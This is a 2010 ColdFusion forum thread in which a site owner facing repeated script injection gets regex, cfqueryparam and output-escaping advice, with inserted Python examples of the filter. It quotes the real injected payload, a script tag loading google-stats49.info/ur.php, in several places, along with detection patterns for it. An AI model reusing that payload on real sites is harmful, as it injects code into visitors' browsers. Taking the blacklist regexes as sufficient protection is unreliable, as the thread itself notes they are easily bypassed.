Regular Expression Help

Guest, Oct 05, 2010

My site is obviously CF and I'm using SQL Server 2005 for my database, and I have been getting hacked for a couple of days now.

XSS or SQL injections, and I can't seem to stop it.

I've added portcullis.cfc, which is supposed to stop XSS and SQL injections, but it didn't help; I get an email from portcullis stating a user was blocked, but the DB is still modified.

I changed all cfquerys to stored procedures, which I was under the impression would help, but nothing; still hacked this morning.

I've updated the server to the latest patches to no avail.

So my last line of defense is "Regular Expressions"; the reason it's my last is I have no clue how to write one.

The offending script that's getting injected is "< / t i t l e > < s c r i p t s r c = h t t p : / / g o o g l e - s t a t s 4 9 . i n f o / u r . p h p > </ s c r i p t>"

Now where you see stats49, sometimes it is stat49 and other times the 49 is a completely different number.

Also, there are no spaces in the script, but I added them for this purpose so as not to inadvertently run the script from this forum.

I would appreciate any help I can get in converting this to a regular expression so I can filter my input.

Regards

Craig Wiseman

1 Correct answer

Valorous Hero, Oct 05, 2010

<script[^>]*>[^<]*</script>

That should find any <script...>...</script> block.

It says find that string "<script"

plus zero or more characters that are not a closing angle bracket [^>]*

plus zero or more characters that are not an opening angle bracket [^<]*

plus the string </script>
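
A worked example of the accepted regex, added here as an illustration; it is not code from the thread or from ColdFusion, and uses Python so it can be run anywhere. It applies `<script[^>]*>[^<]*</script>` to constructed sample field values modelled on the ones described in the thread (the hostnames are the ones quoted in the thread, reused only as data), and adds two things beyond the answer itself: a case-insensitive compile (ColdFusion's REReplace is case-sensitive; REReplaceNoCase is the case-insensitive form) and an optional leading `</title>`, which the poster later asks to remove along with the script. The `INJECTED_LINE` pattern, the sample values and the function names are this example's own assumptions, not the answer's.

```python
import re

# The accepted answer's pattern: "<script", then zero or more characters that
# are not ">", then ">", then zero or more characters that are not "<", then
# "</script>". Compiled with and without IGNORECASE so the difference shows.
SCRIPT_BLOCK_NOCASE = re.compile(r"<script[^>]*>[^<]*</script>", re.IGNORECASE)
SCRIPT_BLOCK_CASE = re.compile(r"<script[^>]*>[^<]*</script>")

# Extension (not from the thread): optionally swallow a "</title>" sitting
# directly in front of the block, which is how the injected line looks here.
INJECTED_LINE = re.compile(r"(?:</title>)?<script[^>]*>[^<]*</script>", re.IGNORECASE)

# Constructed sample field values modelled on the thread's description.
SAMPLES = [
    "</title><script src=http://google-stats49.info/ur.php></script>",
    "</title><script src=http://google-stat51.info/ur.php></script>",
    "Ten years of ColdFusion and SQL Server experience.",
    "<SCRIPT>Alert:Hello world</SCRIPT>",  # mixed case: only the NOCASE pattern sees it
    '<script>var a = "<b>";</script>',     # a "<" inside the body stops [^<]*: no match
]


def find_script_blocks(text, ignore_case=True):
    """Return every substring the accepted-answer regex matches in text."""
    pattern = SCRIPT_BLOCK_NOCASE if ignore_case else SCRIPT_BLOCK_CASE
    return pattern.findall(text)


def strip_script_blocks(text):
    """Delete every matched block, the equivalent of REReplace(text, re, "", "ALL")."""
    return SCRIPT_BLOCK_NOCASE.sub("", text)


def strip_injected_line(text):
    """Delete the block together with the </title> that precedes it."""
    return INJECTED_LINE.sub("", text)


def scrub_report(values):
    """Run the scrub over a list of stored values; return (original, cleaned, changed)."""
    report = []
    for value in values:
        cleaned = strip_injected_line(value)
        report.append((value, cleaned, cleaned != value))
    return report


if __name__ == "__main__":
    for original, cleaned, changed in scrub_report(SAMPLES):
        print(f"{'SCRUBBED' if changed else 'kept    '} {original!r} -> {cleaned!r}")
```

The last sample shows the limit of this filter: because `[^<]*` stops at the first `<`, a script body that contains its own tag is not matched, which is why the regex is a scrub for the known payload rather than a complete defence, and why escaping on output (as the next answer says) matters more.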

Valorous Hero, Oct 05, 2010

First of all, is it XSS or SQL INJECTION?

Those are two completely different attack vectors, and each takes a different approach.

For the latter,

  1. Make sure all your queries are using <cfqueryparam...> (with caveats).
  2. Limit the database user account used by your ColdFusion code to the minimum permissions required to work.
  3. Make sure there isn't any old code hanging around your server that users may be accessing.

For the former,

  1. Users are using your forms to input information. Sanitize ALL inputs from clients: form, url, cookie, etc. They all can be manipulated by hackers.
  2. Store AND|OR display all output from the database with htmlEdit() or htmlCode() or similar functions that will escape all output, rendering XSS code inoperable, though visible.
  3. Consider the XSS protection settings available in the ColdFusion administrator.
  4. Run careful regex filters to clean up the database and/or inspect new inputs. Just be aware that this is an arms race against hackers that few developers have the time, knowledge and|or skills to keep up with. For every countermeasure filter created today, a clever hacker will figure a way around tomorrow.
Guest, Oct 05, 2010

Thanks for the reply ilssac

That's what I'm trying to do regarding the RegEx; I just don't know how to write it. I've been googling it for 3 days and I still can't get one to work.

Valorous Hero, Oct 05, 2010

BrantNews wrote:

That's what I'm trying to do regarding the RegEx,

Well, what are you actually trying to match? What have you tried to do? I.e., what are your requirements? What are your issues? And what have you tried?

Guest, Oct 05, 2010

I'm not sure if you've seen the entire post, but at the bottom of my original post,

there is the offending script, plus I just posted my scrubber with all the offending scripts.

New numbers get added daily.

Guest, Oct 05, 2010

Oh, I wrote a database scrubber and I think this is somewhat the form of a RegEx:

" <cfset tmpVar = REReplace(jobDescription, "</title><script src=htt p://google-stats50.info/ur.php></script>", "", "ALL") />
  <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://goo gle-s tat50.i nfo/ur.php></s cript>", "", "ALL") />
  <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats49.info/ur.php></script>", "", "ALL") />
  <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats48.info/ur.php></script>", "", "ALL") />
  <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats47.info/ur.php></script>", "", "ALL") />  
  <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats45.info/ur.php></script>", "", "ALL") />
  <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats44.info/ur.php></script>", "", "ALL") />  
  <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats43.info/ur.php></script>", "", "ALL") />
  <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats46.info/ur.php></script>", "", "ALL") /> 
  <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats53.info/ur.php></script>", "", "ALL") /> 
  <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats54.info/ur.php></script>", "", "ALL") /> "

But as you see, the attack changes every day. I need something to scrub and validate the data before it hits the DB; getting it out afterwards works, albeit I have to add a new line just about every day when the number changes.

Valorous Hero, Oct 05, 2010

"</title><script src=http://google-stats.*?.info/ur.php></script>"


Should allow you to catch any number, but this is still a very specific filter that will only catch this one attack of the millions of possible variations.

Guide, Oct 05, 2010

Is there any reason you need to be so specific? Surely no-one should be posting scripts into your site *at all*, in which case just search for "<script" as the regex then give them the finger.

Guest, Oct 05, 2010

Yes, that would be perfect... That's what I want.

Guide, Oct 05, 2010

So does that mean it's sorted, or is there still a problem?

Guest, Oct 05, 2010

I would like to know how to write the regex to check for just <script>, then remove that entire line, including the <title> tag.

Guest, Oct 05, 2010

Thanks guys, let me implement this and get back to you...

The attacks usually happen between 3 - 7 AM.

Guest, Oct 05, 2010

Thanks, this worked in my scrubber; now I need to add it to my stored procedure to prevent it from getting into the DB at all.

Guide, Oct 05, 2010

Surely you shouldn't need to have *anything* in a stored procedure if you've already stopped it by then?

Guest, Oct 05, 2010

This is where I'm invoking the stored procedure:

<cfstoredproc procedure="usp_UpdateCandidates" datasource="#dsn#">
  <cfprocparam cfsqltype="CF_SQL_INTEGER" variable="@candidateId" value="#url.candidateId#">
  <cfprocparam cfsqltype="CF_SQL_LONGVARCHAR" variable="@experience" value="#variable.experience#">
  <cfprocparam cfsqltype="CF_SQL_LONGVARCHAR" variable="@family" value="#form.family#">
</cfstoredproc>

It's the experience field getting updated. Is this where the regex should go? I was under the impression it went in the stored procedure.

Guide, Oct 05, 2010

No need, just don't call the sproc in the first place if it's found:

<cfif NOT find("<script", variables.experience)>

  <cfstoredproc procedure="usp_UpdateCandidates" datasource="#dsn#">
    <cfprocparam cfsqltype="CF_SQL_INTEGER" variable="@candidateId" value="#url.candidateId#">
    <cfprocparam cfsqltype="CF_SQL_LONGVARCHAR" variable="@experience" value="#variables.experience#">
    <cfprocparam cfsqltype="CF_SQL_LONGVARCHAR" variable="@family" value="#form.family#">
  </cfstoredproc>

</cfif>
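
The reject-before-write check in the snippet above, together with the parameterised write and the escape-on-output step from ilssac's list earlier in the thread, as one added example. It is not code from the thread or from ColdFusion: it is Python with an in-memory SQLite table standing in for the SQL Server table, and the table layout, function names and sample values are this example's own assumptions. Three things are worth seeing together: the check is made case-insensitive (ColdFusion's find() is case-sensitive; findNoCase() is the case-insensitive form), the update binds the value as a parameter, which is what cfprocparam and cfqueryparam do, and the output is HTML-escaped, which is the role HTMLEditFormat() plays, so a row that was injected before the check existed is still shown as inert text.

```python
import html
import re
import sqlite3

# Case-insensitive form of the gate suggested in the thread, find("<script", ...).
SCRIPT_TAG = re.compile(r"<script", re.IGNORECASE)


def contains_script_tag(value):
    """True if the submitted value contains an opening script tag in any case."""
    return SCRIPT_TAG.search(value) is not None


def open_db():
    """In-memory SQLite table standing in for the SQL Server candidates table
    (constructed for this example; the real schema is not on the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE candidates (candidateId INTEGER PRIMARY KEY, experience TEXT)")
    conn.execute("INSERT INTO candidates VALUES (1, 'original text')")
    conn.commit()
    return conn


def update_experience(conn, candidate_id, experience):
    """Refuse the write when the gate trips; otherwise write with a bound
    parameter, which is the job cfqueryparam / cfprocparam do in ColdFusion:
    the value travels as data and is never spliced into the SQL text."""
    if contains_script_tag(experience):
        return False
    conn.execute(
        "UPDATE candidates SET experience = ? WHERE candidateId = ?",
        (experience, candidate_id),
    )
    conn.commit()
    return True


def read_experience(conn, candidate_id):
    """Fetch the stored value exactly as it sits in the row."""
    row = conn.execute(
        "SELECT experience FROM candidates WHERE candidateId = ?", (candidate_id,)
    ).fetchone()
    return row[0] if row else None


def render_experience(conn, candidate_id):
    """Escape on output (the role HTMLEditFormat() plays in ColdFusion): whatever
    sits in the row is shown as text, so even a row injected before the gate
    existed is inert in the browser."""
    return html.escape(read_experience(conn, candidate_id), quote=True)


def demo():
    """Exercise the gate, the bound parameter and the output escaping; returns a dict."""
    conn = open_db()
    results = {}
    # 1. The thread's payload, in upper case, is rejected before any SQL runs.
    results["blocked"] = update_experience(
        conn, 1, "</title><SCRIPT src=http://google-stats49.info/ur.php></SCRIPT>")
    results["after_block"] = read_experience(conn, 1)
    # 2. Ordinary text with quotes is stored verbatim: bound parameters do not
    #    need the quotes doubled and cannot be broken out of.
    results["accepted"] = update_experience(
        conn, 1, "Ten years' experience; O'Brien's team, SQL Server 2005")
    results["stored"] = read_experience(conn, 1)
    results["rendered"] = render_experience(conn, 1)
    # 3. A row that was already injected (simulated by writing it directly, as
    #    happened before the gate existed) is still harmless once output is escaped.
    conn.execute("UPDATE candidates SET experience = ? WHERE candidateId = ?",
                 ("</title><script src=http://google-stats49.info/ur.php></script>", 1))
    conn.commit()
    results["legacy_rendered"] = render_experience(conn, 1)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The order matters: the gate keeps new payloads out, the bound parameter keeps user text from ever becoming part of the SQL, and the escape on output is what neutralises the rows that were injected before either existed, which is the situation the rest of this thread describes.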

Guest, Oct 05, 2010

ok, interesting, let me check it out and see if it works....

Guest, Oct 05, 2010

Ok, here is what is happening right now...

I installed a CFC that is supposed to prevent XSS and SQL injections called "portcullis.cfc".

It converts <script> to <invalidTag> and inserts this:

</title><InvalidTag src=http://google-stats49.info/ur.php></script>, which is fine because it's inert and cannot cause damage.

That being said, when the hacker inserts it, the invalid tag is back to script again and is harmful; this is why I think I needed it in the SPROC.

I'm fairly new to SPROCs and REALLY new to regex; hope I'm not asking something too stupid.

Valorous Hero, Oct 05, 2010

If I were in your shoes, I would probably remove this portcullis.cfc and rely on the more blunt denials like previously suggested.

P.S. If you just want to make script, and any HTML, inert, the htmlEdit() and|or htmlCode() functions will get EVERYTHING with no fancy CFC needed.

Guest, Oct 05, 2010

Took the advice and removed the CFC, but when I manually run it,

it still comes back as <invalidtag>. Hmmm, interesting.

Valorous Hero, Oct 05, 2010

What do you mean by "comes back"?

Do you mean new attack code is still getting sanitized into this <invalidtag> version?

Or do you mean that content that was already sanitized is being output by your database?

If previously sanitized content was stored in your database, you have not discussed any process on this forum that would remove that stored content; thus it would continue to appear in your output that references said data.

Guest, Oct 05, 2010

What I meant was this...

I removed the portcullis as you recommended.

The portcullis was supposed to change <script> to <invalidTag>.

After I deleted the portcullis CFC, I tested my form by injecting a <script>Alert:Hello world</script>

and what got injected into the DB was <invalidTag>Alert:Hello world</script>

I do have a scrubber I built that goes into the tables every so often and sanitizes them. I modified my scrubber based on the regex script you provided.

Also, until I can get this thing figured out completely, I am sanitizing the output as well; once the DB results are generated, I'm outputting the data using REReplace invoking the regex...

I just noticed that IIS6 was allowing all CGI and ISAPI extensions to run, which could cause the web server to be susceptible to computer viruses or worms that exploit these technologies.

I won't really know anything till tomorrow I guess... like I said, the attacks happen from 3 - 7 AM.

Thanks for all your help

Valorous Hero, Oct 05, 2010

Did you just delete the portcullis CFC source code file?

It is quite possible that the CFC object was initiated and stored into a persistent memory location. Until such a time as that memory variable is purged, the code can still be executing. To know more, one would have to learn how this portcullis product is built and used.

Guest, Oct 05, 2010

Yup, deleted the CFC and removed the call in Application.cfc.

I'm rebooting the server tonight around 1 AM; that should clean it out. In the meantime, I added a second regex to clean the <invalidTag> as well.
